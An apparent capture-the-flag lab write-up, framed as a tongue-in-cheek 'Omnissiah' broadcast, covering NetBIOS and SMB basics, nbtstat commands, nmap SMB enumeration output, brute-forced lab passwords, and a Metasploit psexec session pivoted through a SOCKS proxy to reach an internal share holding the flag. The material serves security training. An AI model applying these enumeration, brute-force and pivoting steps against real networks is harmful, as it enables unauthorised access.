+++ INITIATING LITURGICAL BROADCAST +++
By the Will of the Omnissiah, and the Authority vested in me as Magos Dominus, I transmit this holy data-burst unto the noosphere.
NetBIOS Components
| Component | Port(s) Used | Transport Protocol | Description |
|---|---|---|---|
| NetBIOS Name Service (NBNS) | UDP 137 | UDP | Resolves NetBIOS names to IP addresses; also known as WINS in Windows. |
| NetBIOS Datagram Service | UDP 138 | UDP | Used for connectionless communication; mainly broadcasts for simple messaging. |
| NetBIOS Session Service | TCP 139 | TCP | Handles connection-oriented communication (sessions) over the network. |
SMB Protocol Versions & Differences
| SMB Version | Introduced In | Port(s) Used | Key Features | Major Differences Over Previous |
|---|---|---|---|---|
| SMB 1.0 (CIFS) | Windows NT 4.0 / 95 | TCP 139 (NetBIOS), TCP 445 | Basic file and printer sharing, uses NetBIOS or direct hosting | Very chatty, inefficient, no encryption, deprecated and insecure |
| SMB 2.x | Windows Vista / Windows 7 | TCP 445 | Reduced command set, pipelining, compounding, better performance | Vast performance upgrade, removed NetBIOS dependency |
| SMB 3.0 | Windows 8 / Server 2012 | TCP 445 | Encryption, multichannel, RDMA (SMB Direct), transparent failover | First version with encryption and multichannel support |
| SMB 3.0.2 / 3.02 | Windows 8.1 / Server 2012 R2 | TCP 445 | Resilient file handles, improved failover and performance | Incremental improvements over 3.0 |
| SMB 3.1.1 | Windows 10 / Server 2016+ | TCP 445 | Pre-auth integrity (SHA-512), AES-128 GCM/CCM encryption | Strongest security features, mandatory secure negotiation |
NetBIOS enumeration using ‘nbtstat’
nbtstat is a Windows command-line tool used to query NetBIOS over TCP/IP. It helps with enumerating NetBIOS names, sessions, and caches useful for network diagnostics and reconnaissance.
Common nbtstat Commands
# View local NetBIOS names registered on this machine
nbtstat -n
# Display the local NetBIOS name cache
nbtstat -c
# Flush and reload the NetBIOS name cache
nbtstat -R
# Get the NetBIOS name table of a remote machine (by name)
nbtstat -a TARGET_HOSTNAME
# Get the NetBIOS name table of a remote machine (by IP address)
nbtstat -A 192.168.1.101
# Display current NetBIOS sessions
nbtstat -S
Lab
In this lab the goal is to pivot inside a network and get a flag. I’ve got a machine as starting point and after scanning and enumerating I got an exposed SMB service with plenty of information after using SMB scripts.
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown
Host script results:
|_smb-print-text: false
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-enum-users:
| ATTACKDEFENSE\admin (RID: 1009)
| Flags: Normal user account, Password does not expire
| ATTACKDEFENSE\Administrator (RID: 500)
| Description: Built-in account for administering the computer/domain
| Flags: Normal user account, Password does not expire
| ATTACKDEFENSE\Guest (RID: 501)
| Description: Built-in account for guest access to the computer/domain
| Flags: Account disabled, Normal user account, Password not required, Password does not expire
| ATTACKDEFENSE\root (RID: 1010)
|_ Flags: Normal user account, Password does not expire
|_smb-vuln-ms10-054: false
| smb-ls: Volume \\10.2.29.199\print$
| maxfiles limit reached (10)
| SIZE TIME FILENAME
| <DIR> 2013-08-22T15:39:31 .
| <DIR> 2013-08-22T15:39:31 ..
| <DIR> 2013-08-22T15:39:31 color
| <DIR> 2013-08-22T14:50:22 IA64
| <DIR> 2013-08-22T14:50:22 W32X86
| <DIR> 2013-08-22T14:50:24 W32X86\3
| <DIR> 2013-08-22T14:50:24 W32X86\PCC
| <DIR> 2013-08-22T15:39:31 x64
| <DIR> 2013-08-22T15:39:31 x64\3
| <DIR> 2013-08-22T14:50:22 x64\PCC
|_
|_smb-system-info: ERROR: Script execution failed (use -d to debug)
| smb-enum-shares:
| account_used: <blank>
| \\10.2.29.199\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| \\10.2.29.199\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| \\10.2.29.199\Documents:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: READ
| \\10.2.29.199\Downloads:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: READ
| \\10.2.29.199\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: READ/WRITE
| \\10.2.29.199\Public:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: READ
| \\10.2.29.199\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
|_ Anonymous access: READ
| smb-protocols:
| dialects:
| NT LM 0.12 (SMBv1) [dangerous, but default]
| 2:0:2
| 2:1:0
| 3:0:0
|_ 3:0:2
| smb-mbenum:
|_ ERROR: Call to Browser Service failed with status = 2184
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: attackdefense
| NetBIOS computer name: ATTACKDEFENSE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-07-30T09:26:55+00:00
|_smb-flood: ERROR: Script execution failed (use -d to debug)
| smb-enum-domains:
| ATTACKDEFENSE
| Groups: WinRMRemoteWMIUsers__
| Users: admin, Administrator, Guest, root
| Creation time: 2013-08-22T14:47:57
| Passwords: min length: n/a; min age: n/a days; max age: n/a days; history: n/a passwords
| Account lockout disabled
| Builtin
| Groups: Access Control Assistance Operators, Administrators, Backup Operators, Certificate Service DCOM Access, Cryptographic Operators, Distributed COM Users, Event Log Readers, Guests, Hyper-V Administrators, IIS_IUSRS, Network Configuration Operators, Performance Log Users, Performance Monitor Users, Power Users, Print Operators, RDS Endpoint Servers, RDS Management Servers, RDS Remote Access Servers, Remote Desktop Users, Remote Management Users, Replicator, Users
| Users: n/a
| Creation time: 2013-08-22T14:47:57
| Passwords: min length: n/a; min age: n/a days; max age: 42 days; history: n/a passwords
|_ Account lockout disabled
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-brute:
|_ guest:<blank> => Valid credentials, account disabled
We got some important information such as user accounts , shares and information such as anonymous login enabled.
So the next thing I’ve done is create a wordlist with the user accounts I found so I could bruteforce SMB easier.
[445][smb] host: demo.ine.local login: admin password: tinkerbell
[445][smb] host: demo.ine.local login: Administrator password: password1
[445][smb] host: demo.ine.local login: root password: elizabeth
Now I will just use psexec module from metasploit to get a meterpreter session on the machine.
After getting a session on the machine , normally I would either use metasploit modules to do a network scan to check whether if there is any internal network accessible from the rooted machine + more hosts.
In the lab we were given the IP from a machine on an internal network so I used the socks module from metasploit to create a proxy server for proxychains to work.
I set up the options in the module.
SRVPORT → got this from
/etc/proxychains4.conf→ 9050
I then ran the proxy server so I could use nmap to scan the internal network from my machine through the autoroute tables from the metasploit session.
The flag
About the flag I got it doing the following:
In the lab we were introduced to net view and so with this meterpreter session I didn’t have access to this , so I migrated it to another process (explorer.exe) , after this I got the following:
Share name Type Used as Comment
-------------------------------------------------------------------------------
Documents Disk
K Disk
The command completed successfully.Made those resources accessible with net use D: \\10.2.19.82\Documents
And :
C:\Windows\system32>dir D:\
dir D:\
Volume in drive D has no label.
Volume Serial Number is 5CD6-020B
Directory of D:\
01/04/2022 05:22 AM <DIR> .
01/04/2022 05:22 AM <DIR> ..
01/04/2022 05:07 AM 1,425 Confidential.txt
01/04/2022 05:22 AM 70 FLAG2.txt
2 File(s) 1,495 bytes
2 Dir(s) 6,606,315,520 bytes free
GLORY TO THE OMNISSIAH. PRAISE THE BINARY DIVINE.
+++ LITURGICAL BROADCAST COMPLETE +++